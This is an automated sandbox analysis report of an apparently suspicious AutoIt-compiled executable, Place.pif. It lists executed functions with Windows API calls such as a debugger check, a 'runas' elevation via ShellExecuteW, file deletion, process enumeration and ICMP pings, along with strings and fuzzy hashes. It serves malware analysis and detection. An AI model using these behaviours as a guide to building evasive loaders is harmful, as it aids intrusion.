Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

Analysis Process: Place.pifPID: 7132, Parent PID: 7108COMMON

Execution Graph

Execution Coverage:	4.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	125

Executed Functions

Function 00595240 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0059526C
IsDebuggerPresent.KERNEL32 ref: 0059527E
GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 005952E6

Part of subcall function 00591821: _memmove.LIBCMT ref: 0059185B

Part of subcall function 0058BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0058BC07

SetCurrentDirectoryW.KERNEL32(?), ref: 00595366
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 005D0B2E
SetCurrentDirectoryW.KERNEL32(?), ref: 005D0B66
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00636D10), ref: 005D0BE9
ShellExecuteW.SHELL32(00000000), ref: 005D0BF0

Part of subcall function 0059514C: GetSysColorBrush.USER32(0000000F), ref: 00595156
Part of subcall function 0059514C: LoadCursorW.USER32(00000000,00007F00), ref: 00595165
Part of subcall function 0059514C: LoadIconW.USER32(00000063), ref: 0059517C
Part of subcall function 0059514C: LoadIconW.USER32(000000A4), ref: 0059518E
Part of subcall function 0059514C: LoadIconW.USER32(000000A2), ref: 005951A0
Part of subcall function 0059514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 005951C6
Part of subcall function 0059514C: RegisterClassExW.USER32(?), ref: 0059521C

Part of subcall function 005950DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00595109
Part of subcall function 005950DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0059512A
Part of subcall function 005950DB: ShowWindow.USER32(00000000), ref: 0059513E
Part of subcall function 005950DB: ShowWindow.USER32(00000000), ref: 00595147

Part of subcall function 005959D3: _memset.LIBCMT ref: 005959F9
Part of subcall function 005959D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00595A9E

Strings

AutoIt, xrefs: 005D0B23
runas, xrefs: 005D0BE4
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 005D0B28

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 529118366-2030392706
Opcode ID: f8094d5b83deb1ed895948194bc98fd82ccd3dfd4454f408598c2ba58340c81a
Instruction ID: 0ca86db139cf3e8f3f88ab97d272acbc30fc549abd314e9f3143a238d3cc571e
Opcode Fuzzy Hash: f8094d5b83deb1ed895948194bc98fd82ccd3dfd4454f408598c2ba58340c81a
Instruction Fuzzy Hash: A7510730A0864AEADF12AFB4DC0AEEE7F7ABB85340F145466F451621A2DBF00645DB64

Function 00595D13 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00595D40

Part of subcall function 00591821: _memmove.LIBCMT ref: 0059185B

GetCurrentProcess.KERNEL32(?,00610A18,00000000,00000000,?), ref: 00595E07
IsWow64Process.KERNEL32(00000000), ref: 00595E0E
GetNativeSystemInfo.KERNEL32(00000000), ref: 00595E54
FreeLibrary.KERNEL32(00000000), ref: 00595E5F
GetSystemInfo.KERNEL32(00000000), ref: 00595E90
GetSystemInfo.KERNEL32(00000000), ref: 00595E9C

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 228d8056365f55de904a40f6e1c7ec325bb7cbd898475cba50316458178d7735
Instruction ID: 44f9fc2e052afb5abe05757d75f0f6365a50b9de166d4678cee2cba9910173d9
Opcode Fuzzy Hash: 228d8056365f55de904a40f6e1c7ec325bb7cbd898475cba50316458178d7735
Instruction Fuzzy Hash: 5D91C431549BC0DECB32DB7884545AABFE57F25300B984A9FD0C793B41E235AA48C759

Function 005E4005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 005A0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00592A58,?,00008000), ref: 005A02A4

Part of subcall function 005E4FEC: GetFileAttributesW.KERNEL32(?,005E3BFE), ref: 005E4FED

FindFirstFileW.KERNEL32(?,?), ref: 005E407C
DeleteFileW.KERNEL32(?,?,?,?), ref: 005E40CC
FindNextFileW.KERNELBASE(00000000,00000010), ref: 005E40DD
FindClose.KERNEL32(00000000), ref: 005E40F4
FindClose.KERNEL32(00000000), ref: 005E40FD

Strings

\*.*, xrefs: 005E404E

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 2e571eca4a56ddfcfa718926eac983949abbcf6216453b3a5ef7050eec6267bb
Instruction ID: afb7f64ed9b294b385a17086473f800c6acb705fb77e3e3b368e9c04433bdbd7
Opcode Fuzzy Hash: 2e571eca4a56ddfcfa718926eac983949abbcf6216453b3a5ef7050eec6267bb
Instruction Fuzzy Hash: F03163310083969BCB05EF60C8999EFBBECBE95304F444A2DF5E582191DB35DA09CB56

Function 005E4148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 005E416D
Process32FirstW.KERNEL32(00000000,?), ref: 005E417B
Process32NextW.KERNEL32(00000000,?), ref: 005E419B
CloseHandle.KERNEL32(00000000), ref: 005E4245

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 3722e7603cf6b4abcf8f4c78993b7d33811c1eede8190fd5aa497b0774f30614
Instruction ID: 9b206160294906dc93d920fc400835ad067dfbe04ac0c74c28ad10f7c05d4816
Opcode Fuzzy Hash: 3722e7603cf6b4abcf8f4c78993b7d33811c1eede8190fd5aa497b0774f30614
Instruction Fuzzy Hash: 5F3182711083429FD704EF91D889AAFBFE8BFD5350F44092DF5C5821A1EB719949CB52

Function 005894E0 Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 539COMMON

Download Yara Rule

Strings

_5Y, xrefs: 005895A5, 0058973B, 00589743

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID:
String ID: _5Y
API String ID: 0-673684345
Opcode ID: 3bf7e4127bf1d204576ae044620c5cba3d6ec9739a13e1f94c4d961f29231ba7
Instruction ID: 7ae785835f44a09856aea575be6df15105e6a3344401153a5461dd6ab0ef84c2
Opcode Fuzzy Hash: 3bf7e4127bf1d204576ae044620c5cba3d6ec9739a13e1f94c4d961f29231ba7
Instruction Fuzzy Hash: EB229B74A00216DFDB24EF54C884BBEBBB0FF49310F188569EC56AB351E774A981CB91

Function 0058B020 Relevance: 5.6, APIs: 3, Instructions: 1146COMMON

Download Yara Rule

APIs

Part of subcall function 00593740: CharUpperBuffW.USER32(?,006471DC,00000000,?,00000000,006471DC,?,005853A5,?,?,?,?), ref: 0059375D

_memmove.LIBCMT ref: 0058B68A

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: BuffCharUpper_memmove
String ID:
API String ID: 2819905725-0
Opcode ID: a491274cd6d187b0bc8c24c2d64aaa422bb5b0a0ffd842c1cbd76a62ab92b6d7
Instruction ID: 534c588cc167200c6b03dac99a7a9028724d5f8aa668cae54e825406e78969d4
Opcode Fuzzy Hash: a491274cd6d187b0bc8c24c2d64aaa422bb5b0a0ffd842c1cbd76a62ab92b6d7
Instruction Fuzzy Hash: 4DA289746087428FE724EF14C484B2ABBE5FF85304F14895DE89AAB361D771ED45CB82

Function 0058BC70 Relevance: 50.4, APIs: 22, Strings: 6, Instructions: 1379sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0058BF57

Part of subcall function 005852B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005852E6

Sleep.KERNEL32(0000000A,?,?), ref: 005C36B5

Strings

CALL, xrefs: 0058C277
@GUI_WINHANDLE, xrefs: 005C37C1
@COM_EVENTOBJ, xrefs: 005C3D2E
@TRAY_ID, xrefs: 005C3FCD
@GUI_CTRLHANDLE, xrefs: 005C3816
@GUI_CTRLID, xrefs: 005C376C

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: MessagePeekSleepTimetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
API String ID: 1792118007-922114024
Opcode ID: 40f3774e6fc4eb684df4add8a8feeb645ed83e0251e5840ce08e67ef4af0b155
Instruction ID: 10adc002498bdee54848a145ae0e151d99fdc70ea39270f58b24d78df0c42c20
Opcode Fuzzy Hash: 40f3774e6fc4eb684df4add8a8feeb645ed83e0251e5840ce08e67ef4af0b155
Instruction Fuzzy Hash: E0C2AF706083429FD724EF64C858FAEBFE5BF84304F14891DE98A972A1DB71E944CB52

Function 005833E7 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 72
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00583444
RegisterClassExW.USER32(00000030), ref: 0058346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0058347F
InitCommonControlsEx.COMCTL32(?), ref: 0058349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005834AC
LoadIconW.USER32(000000A9), ref: 005834C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005834D1

Strings

AutoIt v3 GUI, xrefs: 00583460
TaskbarCreated, xrefs: 00583474
+, xrefs: 0058342D
0, xrefs: 00583426

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: b8ae3df0e0b9c6adadfe3d0640f81d9686571bc319782868991301b1e62c1ab4
Instruction ID: 5b712e70841a001f7d8c578bf62134c07cbaaa5d9511685e9a9e9a12fc030b04
Opcode Fuzzy Hash: b8ae3df0e0b9c6adadfe3d0640f81d9686571bc319782868991301b1e62c1ab4
Instruction Fuzzy Hash: CF311875845309AFEB40CFA4EC88AD9BBF5FB0A310F14915AF940A62A0D7B55585CF90

Function 00583411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00583444
RegisterClassExW.USER32(00000030), ref: 0058346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0058347F
InitCommonControlsEx.COMCTL32(?), ref: 0058349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005834AC
LoadIconW.USER32(000000A9), ref: 005834C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005834D1

Strings

AutoIt v3 GUI, xrefs: 00583460
TaskbarCreated, xrefs: 00583474
+, xrefs: 0058342D
0, xrefs: 00583426

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: af481288fb0f5ba0caae169300b084adf51528d34bb05e1d2423c9043323055d
Instruction ID: 8742659d9025a1feefb7c474db70ed07c3c6fa4d04720242640c76656fda92ae
Opcode Fuzzy Hash: af481288fb0f5ba0caae169300b084adf51528d34bb05e1d2423c9043323055d
Instruction Fuzzy Hash: F421E2B5905209AFEF00DFA4EC88BDDBBF6FB09700F04A11AF911A62A0D7B11584CF91

Function 00592FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 005A00CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00593094), ref: 005A00ED

Part of subcall function 005A08C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,0059309F), ref: 005A08E3

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 005930E2
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 005D01BA
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 005D01FB
RegCloseKey.ADVAPI32(?), ref: 005D0239
_wcscat.LIBCMT ref: 005D0292

Strings

Include, xrefs: 005D01B1, 005D01F2
Software\AutoIt v3\AutoIt, xrefs: 005930D8
\Include\, xrefs: 0059309F
\, xrefs: 005D02B5

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: e16c3e4712dfd8f9f8fd1ce415a30925ee61334f411b7c6b7b0f1f4af8475bc6
Instruction ID: 3a2c1b0bac0a3a50fd608e0e47c71b0ce28922da52c0173b54139ba0b94f1d44
Opcode Fuzzy Hash: e16c3e4712dfd8f9f8fd1ce415a30925ee61334f411b7c6b7b0f1f4af8475bc6
Instruction Fuzzy Hash: 71718D755057029ECB10EF29E8499AFBFE9FF86350F40192EF445832A1EFB09A44CB95

Function 0059514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00595156
LoadCursorW.USER32(00000000,00007F00), ref: 00595165
LoadIconW.USER32(00000063), ref: 0059517C
LoadIconW.USER32(000000A4), ref: 0059518E
LoadIconW.USER32(000000A2), ref: 005951A0
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 005951C6
RegisterClassExW.USER32(?), ref: 0059521C

Part of subcall function 00583411: GetSysColorBrush.USER32(0000000F), ref: 00583444
Part of subcall function 00583411: RegisterClassExW.USER32(00000030), ref: 0058346E
Part of subcall function 00583411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0058347F
Part of subcall function 00583411: InitCommonControlsEx.COMCTL32(?), ref: 0058349C
Part of subcall function 00583411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005834AC
Part of subcall function 00583411: LoadIconW.USER32(000000A9), ref: 005834C2
Part of subcall function 00583411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005834D1

Strings

0, xrefs: 005951FA
AutoIt v3, xrefs: 0059520B
#, xrefs: 00595201

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 7b4c5dd9d8075de8d333434a6ae4898ee9175193f9a4ee75af215b9971d346be
Instruction ID: 71085dbcee30bc37337bfb08eb25b6786e86fabbad0585e2d5a3067d8c4867aa
Opcode Fuzzy Hash: 7b4c5dd9d8075de8d333434a6ae4898ee9175193f9a4ee75af215b9971d346be
Instruction Fuzzy Hash: B7214B74904308AFEF119FA4ED09B9E7FB6FB09711F00551AF504A62A0D7F59650DF84

Function 005F5E1D Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000101,?), ref: 005F5E7E
inet_addr.WSOCK32(?,?,?), ref: 005F5EC3
gethostbyname.WS2_32(?), ref: 005F5ECF
IcmpCreateFile.IPHLPAPI ref: 005F5EDD
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 005F5F4D
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 005F5F63
IcmpCloseHandle.IPHLPAPI(00000000), ref: 005F5FD8
WSACleanup.WSOCK32 ref: 005F5FDE

Strings

Ping, xrefs: 005F5F01

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 09ae3ea2eae7bb5d5f5891e5699a250fa0210e997cbfe4b2f15d58758c64e065
Instruction ID: 06bfc5281153ede8883780e9463f0eeb6f7117a7e089bf6f580a11997dddc399
Opcode Fuzzy Hash: 09ae3ea2eae7bb5d5f5891e5699a250fa0210e997cbfe4b2f15d58758c64e065
Instruction Fuzzy Hash: C9518F716046059FDB20EF24CC49B6ABBE5FB88710F148969FB55DB2A0EB74E940CB42

Function 00594D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00594E22
KillTimer.USER32(?,00000001), ref: 00594E4C
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00594E6F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00594E7A
CreatePopupMenu.USER32 ref: 00594E8E
PostQuitMessage.USER32(00000000), ref: 00594EAF

Strings

TaskbarCreated, xrefs: 00594E75

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: be318e31a7b77c8b351ae3dac2cd007f5283a9b0212400d87c593e1e511558eb
Instruction ID: be7dfeb4dfa7416c7e14649ec129520b48622523255d794603c78b237e7798c9
Opcode Fuzzy Hash: be318e31a7b77c8b351ae3dac2cd007f5283a9b0212400d87c593e1e511558eb
Instruction Fuzzy Hash: 8941097120820AABEF255F28DC0DFBE3E5EF755300F041A26F901962E1DBB19C529B62

Function 005956F8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 005D0C5B

Part of subcall function 00591821: _memmove.LIBCMT ref: 0059185B

_memset.LIBCMT ref: 00595787
_wcscpy.LIBCMT ref: 005957DB
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 005957EB
__swprintf.LIBCMT ref: 005D0CD1

Strings

Line %d: , xrefs: 005D0CCB
AutoIt - , xrefs: 00595760

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
